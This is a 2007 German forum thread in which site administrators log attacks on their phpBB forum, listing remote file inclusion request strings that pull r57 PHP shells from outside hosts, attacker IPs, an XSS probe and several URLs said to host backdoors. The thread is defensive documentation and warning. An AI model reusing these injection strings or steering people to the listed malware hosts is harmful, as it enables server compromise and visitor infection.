opensky Foren-Übersicht
    NAVIGATION Portal  •  Forum  •  Profil  •  Suchen   •  Registrieren  •  Einloggen, um private Nachrichten zu lesen  •  Login   
intro

 Hacker / Cracker- Angriffe auf unser Forum Opensky.cc

Neues Thema eröffnenNeue Antwort erstellen opensky Foren-Übersicht » Hacker / Cracker Angriffe auf unser Forum Opensky.cc

Beitrag Verfasst am: 29.04.2007, 21:37    Hacker / Cracker- Angriffe auf unser Forum Opensky.cc
Antworten mit Zitat    Nach oben 

 Message 
  
Vermehrte Hacker/Cracker-Angriffe auf unser Forum Opensky.cc

Forenbetreiber ACHTUNG: Auf folgenden Webseiten lauern Viren +Trojaner! Twisted Evil

Last Update: 14. Juli 2007, 09:30 MEZ

Hier dokumentieren wir Angriffe sowie Domains und deren Verzeichnisse, die durch Viren/Trojaner infiziert sind. Mittels dieser Schädlinge wird ungeschützte Foren- oder andere Software angegriffen.

Der folgende Hinweis gilt für alle in diesem Forum gelisteten Seiten:

opensky.cc / forum.opensky.cc übernimmt keinerlei Haftung für Schäden, die durch unsachgemäße Handhabung der Adressen entstehen.

Wir warnen: Links NICHT anklicken ohne spez. Schutzmassnahmen!


Idea Aktueller Tip:

Browser in Sandboxie laufen lassen, besonders wenn Du potentiell gefaehrliche Webseiten besuchst!

 

Hidden

Eoleon

Techn. Admin
Techn. Admin





Anmeldungsdatum: 13.04.2007
Beiträge: 45


germany.gif

Beitrag Verfasst am: 29.04.2007, 21:41    Hacker / Cracker- Angriffe auf unser Forum Opensky.cc
Antworten mit Zitat    Nach oben 

 Message 
  
1.) 27. April 2007 - Virus: PHP/Rst.e *
treibball.de/components/com_extcalendar/r57.txt?
* Die Datei wurde auf mein Betreiben hin vom Hoster gelöscht.
In der Datei befanden sich die Erkennungsmerkmale des
Virus PHP/Rst.e **
Dieser wird mit der aktuellen Version von AntiVir erkannt.
** Die Datei wurde von Opensky bei der Avira GmbH zur Überprüfung eingesandt.


2.) 27. April 2007 - Virus: BDS/PHP.Small.A' [BDS/PHP.Small.A]yem.wpc.or.kr/event_popup/2000603Japan/0603Japan.files/slide0013_image112.jpg?&cmd=id

 

_________________
"Wenn ich mir 'nen Döner ans Ohr halte, dann höre ich wenigstens das 'Schweigen der Lämmer'."
Dieter Bohlen
Hidden

Eoleon

Techn. Admin
Techn. Admin





Anmeldungsdatum: 13.04.2007
Beiträge: 45


germany.gif

Beitrag Verfasst am: 13.06.2007, 14:37    Hacker / Cracker- Angriffe auf unser Forum - Dokumentation
Antworten mit Zitat    Nach oben 

 Message 
  
Mehrere Angriffe auf unser Forum am 13.+ 14. Juni 2007:


Image


Script:
/xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1///ixxx=http://secretagent.by.ru/r57.php??
libwww-perl/5.803 211.133.240.90

ACHTUNG, der Infektionsversuch auf der Seite http://secretagent.by.ru/r57.php?? findet OHNE Aktion des Besuchers statt!
(Schaedling: Backdoor BDS/PHP.Rst.F.3 / Avira)

Weitere infizierte Seite:
http://vegeta.co.jp/57?? (Schaedling: Backdoor BDS/PHP.Rst.F.8 /Avira)

*

 

_________________
*
"Wer Sicherheit der Freiheit vorzieht ist zu Recht ein Sklave!" Aristoteles

"Es gibt zwei Dinge, bei deren Herstellung man besser wegschaut, damit einem nicht schlecht wird: Wurst und Gesetze!" Winston Churchill

Zuletzt bearbeitet von opensky am 16.06.2007, 10:21, insgesamt 3-mal bearbeitet
Offline

opensky

Administrator
Administrator



Geschlecht:
Alter: 62
Anmeldungsdatum: 13.04.2007
Beiträge: 197
Wohnort: In the NET

switzerland.gif

Beitrag Verfasst am: 16.06.2007, 09:54    Hacker / Cracker- Angriffe auf unser Forum Opensky.cc
Antworten mit Zitat    Nach oben 

 Message 
  
21 Angriffe auf unser Forum innert 4 Std. am 15/.16 Juni 2007:

Logeintraege:

1 16.06.2007, 00:15 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
2 15.06.2007, 23:43 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
3 15.06.2007, 23:43 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
4 15.06.2007, 22:04 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
5 15.06.2007, 21:51 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
6 15.06.2007, 21:47 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.805
7 15.06.2007, 21:47 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.805
8 15.06.2007, 21:27 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
9 15.06.2007, 21:27 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
10 15.06.2007, 21:20 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
11 15.06.2007, 21:20 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
12 15.06.2007, 21:20 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1//XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.805
13 15.06.2007, 21:20 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1//XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.805
14 15.06.2007, 21:18 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1//iXXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
15 15.06.2007, 21:13 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1///XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.64
16 15.06.2007, 21:13 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1///XX=http://secretagent.by.ru/r57.php?? libwww-perl/5.64
17 15.06.2007, 21:13 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1//XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.64
18 15.06.2007, 21:13 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1//iXXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.64
19 15.06.2007, 21:13 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1//XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
20 15.06.2007, 21:06 /xx.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1//XXX=http://secretagent.by.ru/r57.php?? libwww-perl/5.803
21 15.06.2007, 21:06 /xx.php?sid=d5090f311808e638ba25a61b8aa75af1//XXX.=http://secretagent.by.ru/r57.php?? libwww-perl/5.803

9 Angriffe auf unser Forum am 16/17. Juni 2007:

17.06.2007, 06:07 /kb.php?sid=e61e2b7d0cf8768c1c0964c813ce42f1//includes/kb_constants.php?module_root_path=http://www.asqbuffalo.org/logs/error? libwww-perl/5.805 194.50.80.90

17.06.2007, 06:07 /kb.php?sid=d5090f311808e638ba25a61b8aa75af1//includes/kb_constants.php?module_root_path=http://www.asqbuffalo.org/logs/error?
libwww-perl/5.805 194.50.80.90

17.06.2007, 20:22 /links.php?t=http://www.yescolombia.com/psv? libwww-perl/5.805 217.153.49.138

17.06.2007, 20:22 /kb.php?mode=http://www.yescolombia.com/psv? libwww-perl/5.805 217.153.49.138

17.06.2007, 18:52 /kb.php?mode=http://www.yescolombia.com/psv?? libwww-perl/5.79 84.243.253.32

17.06.2007, 06:12 /portal.php? ia_archiver 64.208.172.173

17.06.2007, 05:52 /portal.php? ia_archiver 64.208.172.173

16.06.2007, 06:22 /kb.php?mode=http://www.yescolombia.com/psv? libwww-perl/5.805 83.17.218.74

16.06.2007, 05:42 /printview.php?t=http://www.yescolombia.com/psv? libwww-perl/5.79 64.78.186.20

Einer der notorischen Angreifer konnte in Deutschland eruiert werden. Wir haben ihn angeschrieben und zur Stellungsnahme aufgefordert. Ihn erwartet allenfalls eine Strafanzeige.

Alle anderen Angreifer haben wir anhand der von uns mitgeloggten IPs dem FBI gemeldet. Dieses fuehrt zur Zeit mit Hilfe von Microsoft und InterPol eine weltweite und bereits erfolgreiche Aktion gegen Botnetzbetreiber und Spammer durch.

Wir WARNEN hier unmissverstaendlich: Wir werden JEDEN Angreifer verfolgen. Das Rattenloch, in dem er sich verstecken kann, ohne dass wir ihn finden, gibt es auf diesem Planeten NICHT.

Peter Schlegel / Admin


*

 

Offline

opensky

Administrator
Administrator



Geschlecht:
Alter: 62
Anmeldungsdatum: 13.04.2007
Beiträge: 197
Wohnort: In the NET

switzerland.gif

Beitrag Verfasst am: 22.06.2007, 17:04    Hacker / Cracker- Angriffe auf unser Forum Opensky.cc
Antworten mit Zitat    Nach oben 

 Message 
  
« opensky » hat folgendes geschrieben:
21 Angriffe auf unser Forum innert 4 Std. am 15/.16 Juni 2007:
Einer der notorischen Angreifer konnte in Deutschland eruiert werden. Wir haben ihn angeschrieben und zur Stellungsnahme aufgefordert. Ihn erwartet allenfalls eine Strafanzeige.


Update, 22. Juni 2007: Da sich dieser Angreifer (IP 85.131.213.199) auf unsere eMail nicht innert der anberaumten Frist von 5 Tagen gemeldet hat, zeigen wir ihn an.

Neue Angriffe vom 20. - 22 Juni 2007

1.) 22.06.2007, 08:41 / XXX=http://vcsok.com/nabil?
libwww-perl/5.79 IP 212.241.193.103

2.) 22.06.2007, 08:41 /XXX=http://vcsok.com/nabil? libwww-perl/5.79 IP 212.241.193.103

3.) 21.06.2007, 16:36 /XXX=http://www.milw0rm.com/exploits/4080? libwww-perl/5.805 IP 67.19.194.20

4.) 21.06.2007, 16:36 XXX=http://www.milw0rm.com/exploits/4080? libwww-perl/5.805 IP67.19.194.20

5.) 21.06.2007, 11:10 XXX=http://scan.ifastnet.com/canboy? libwww-perl/5.805 IP85.8.131.174

6.) 21.06.2007, 11:09 XXX=http://scan.ifastnet.com/canboy? libwww-perl/5.805 IP 85.8.131.174

7.) 21.06.2007, 11:01 XXX=http://scan.ifastnet.com/canboy? libwww-perl/5.805 IP 85.8.131.174

8.) 21.06.2007, 11:01 XXX=http://scan.ifastnet.com/canboy? libwww-perl/5.805 IP 85.8.131.174

9.) 20.06.2007, 15:23 XXX=http://the-five.com/forums/avatars/jan.cok?? libwww-perl/5.805 IP 209.90.114.35

ACHTUNG: Bei dem auf der IP 209.90.114.35 liegenden Script handelt es sich gem. Avira um einen neuen Schaedling!

Zitat:
Die Datei 'Angriffe_20..Juni 2007.txt' wurde als 'MALWARE' eingestuft.Unsere Analytiker haben in dieser Datei eine "Security oder Privacy Risk" gefunden. Hierbei handelt es sich um ein Programm, das möglicherweise in der Lage ist, die Sicherheit Ihres Systems zu beeinträchtigen, von Ihnen nicht gewünschte Programmaktivitäten auszulösen oder Ihre Privatsphäre zu verletzen.Ein Erkennungsmuster wird mit einem der nächsten Updates der Virendefinitionsdatei (VDF) hinzugefügt werden.

Mit freundlichen Grüßen,
Avira Virus Lab Response Team


Die neuesten Angriffe analysieren wir noch. Vor allem das auf

http://www.milw0rm.com/exploits/4080?

Script hat es in sich!

Peter / Admin


 


Zuletzt bearbeitet von opensky am 25.06.2007, 09:30, insgesamt einmal bearbeitet
Offline

opensky

Administrator
Administrator



Geschlecht:
Alter: 62
Anmeldungsdatum: 13.04.2007
Beiträge: 197
Wohnort: In the NET

switzerland.gif

Beitrag Verfasst am: 25.06.2007, 09:26    Angriffe auf unser Forum am 25. Juni 2007 - Dokumentation
Antworten mit Zitat    Nach oben 

 Message 
  
Angriff vom 24.06.2007, 22:17

/kb.php?XXXpath=http://www.gattuso.altervista.org/r57?? libwww-perl/5.65, IP des Angreifers: 64.239.73.64

ACHTUNG: Auf der Seite

http://www.gattuso.altervista.org/r57??

liegt ein Script, welches von Avira folgendermassen charakterisiert wird:

Zitat:
Die Datei 'Angriff_Script_25_Juni_2007.txt' wurde als 'MALWARE' eingestuft. Unsere Analytiker haben dieser Bedrohung den Namen PHP/Rst.e gegeben.Bei der Bezeichnung "PHP/" handelt es sich um ein PHP-Script-Virus.


Danke, Avira-Team, fuer die Analyse innert 2 Stunden, das ist verd. schnell!
*

 

Offline

opensky

Administrator
Administrator



Geschlecht:
Alter: 62
Anmeldungsdatum: 13.04.2007
Beiträge: 197
Wohnort: In the NET

switzerland.gif

Beitrag Verfasst am: 06.07.2007, 12:20    Besonders gehaltvolle Seite!
Antworten mit Zitat    Nach oben 

 Message 
  
ACHTUNG, eine besonders gehaltvolle Seite ist

http://lott.by/d?

Kommentare dazu:

Zitat:
http://www.computec.ch/forum_viewtopic.php?8.13996
Hi, vielleicht kein script sondern eine Shell-Datei im großes Styl? Ein Rootkit oder ähnliches um anschließend den Server zu steuern?
Liebe Grüße. Helms


Zitat:
http://www.hackerboard.de/thread.php?postid=234134
Sieht mir nach ner php shell aus mal schnell drüber geflogen,kannst ja mal den irc server joinen^^
//hab noch im code ne email addy gefunden kannst ja reinschreiben^^
tipp zum besser lesen quelltxt anzeigen lassen
cu Chakky


Idea Aktueller Tip:

Browser in Sandboxie laufen lassen, besonders wenn Du potentiell gefaehrliche Webseiten besuchst!

 

Offline

opensky

Administrator
Administrator



Geschlecht:
Alter: 62
Anmeldungsdatum: 13.04.2007
Beiträge: 197
Wohnort: In the NET

switzerland.gif

Beitrag Verfasst am: 06.07.2007, 22:45    (Kein Titel)
Antworten mit Zitat    Nach oben 

 Message 
  
einige Atts auf uns sind nicht ohne wink
Z.B. war der Angriff mit Milworm auch nicht von schlechten Eltern und hätte einen Overtake nach sich gezogen.

 

_________________
"Wenn ich mir 'nen Döner ans Ohr halte, dann höre ich wenigstens das 'Schweigen der Lämmer'."
Dieter Bohlen
Hidden

Eoleon

Techn. Admin
Techn. Admin





Anmeldungsdatum: 13.04.2007
Beiträge: 45


germany.gif

Beitrag Verfasst am: 14.07.2007, 09:41    Schwarzer Tag fuer Angreifer
Antworten mit Zitat    Nach oben 

 Message 
  
Freitag der 13. gilt bekanntlich als Pechbringer. Das bewahrheitete sich auch fuer einen Angreifer, der am 13. Juli 2007 nicht weniger als 16 mal erfolglos versuchte, unser Forum zu Cracken. Smile


Image


Exclamation Er hinterliess Spuren: ACHTUNG, seine Webseite ist infektioes! Exclamation

Heute ist unser Forum exakt 3 Monate online, wir hatten gestern den 20'000-en Besucher und in dieser relativ kurzen Zeit 625 Angriffe. Wir werten das als Zeichen, dass wir ernst genommen werden - das ist uns ein Ansporn, erst recht weiterzumachen!

Peter alias Opensky

NB. Dass dieser Beitrag die Referenz 313#313 traegt, ist eine huebsche Synchronizitaet! Smile

 

_________________
*
"Wer Sicherheit der Freiheit vorzieht ist zu Recht ein Sklave!" Aristoteles

"Es gibt zwei Dinge, bei deren Herstellung man besser wegschaut, damit einem nicht schlecht wird: Wurst und Gesetze!" Winston Churchill
Offline

opensky

Administrator
Administrator



Geschlecht:
Alter: 62
Anmeldungsdatum: 13.04.2007
Beiträge: 197
Wohnort: In the NET

switzerland.gif

Beitrag Verfasst am: 28.07.2007, 01:09    (Kein Titel)
Antworten mit Zitat    Nach oben 

 Message 
  
27.07.2007, 19:34 /search.php?3Cscript%3Ealert(%22XSS%22)%3C/script%3E

86 frustrane Atts binnen 1 Min ... zwar nicht auf opensky, sondern auf mein Hoyaforum.
Man, man, man ....

 

_________________
"Wenn ich mir 'nen Döner ans Ohr halte, dann höre ich wenigstens das 'Schweigen der Lämmer'."
Dieter Bohlen
Hidden

Eoleon

Techn. Admin
Techn. Admin





Anmeldungsdatum: 13.04.2007
Beiträge: 45


germany.gif

Beitrag Verfasst am: 31.07.2007, 09:07    Neuer alter schmutziger Trick
Antworten mit Zitat    Nach oben 

 Message 
  
Zum ersten mal wurde versucht, unser Forum (resp. unsere Besucher) mit einem alten Trick anzugreifen. Ein Spammer registrierte sich als Mitglied und hinterlegte in seinem Benutzerprofil einen Link, der auf eine infektioese Webseite fuehrt. Twisted Evil

Exclamation Infektioeser Link: http://idoltrek.info Exclamation

Ueberhaupt haben wir das Vergnuegen, taeglich etwa 10 neue "Mitglieder", die in Wirklichkeit Spammer sind, hinauszuwerfen. Wir ueberpruefen jeden eingetragenen Link - solange das zeitlich noch moeglich ist. Trotzdem mahnen wir unsere Besucher zur Vorsicht beim Aufruf von Links, wie sie dies generell bei jeder Webseite machen sollten.

Einmal mehr hat sich bewaehrt, den Browser in einer Sandbox laufen zu lassen! Dies wuerde eine Infektion des Betriebssystems auch dann verhindern, wenn der Virenscanner einen Tojaner/Virus noch nicht erkennen sollte.

Also: SandBoxie benutzen!

Hier noch der ScreenShot des Benutzerprofiles des Angreifers:

Image

 

Offline

opensky

Administrator
Administrator



Geschlecht:
Alter: 62
Anmeldungsdatum: 13.04.2007
Beiträge: 197
Wohnort: In the NET

switzerland.gif

Beiträge der letzten Zeit anzeigen:      
Neues Thema eröffnenNeue Antwort erstellen opensky Foren-Übersicht » Hacker / Cracker Angriffe auf unser Forum Opensky.cc



 Gehe zu:   




Berechtigungen anzeigen




3500 Angriffe abgewehrt

Powered by Orion based on phpBB © 2001, 2002 phpBB Group
Style and modified by forumshelp.de
Alle Zeiten sind GMT + 2 Stunden

[ Page generation time: 0.1754s (PHP: 67% - SQL: 33%) | SQL queries: 17 | GZIP disabled | Debug on ]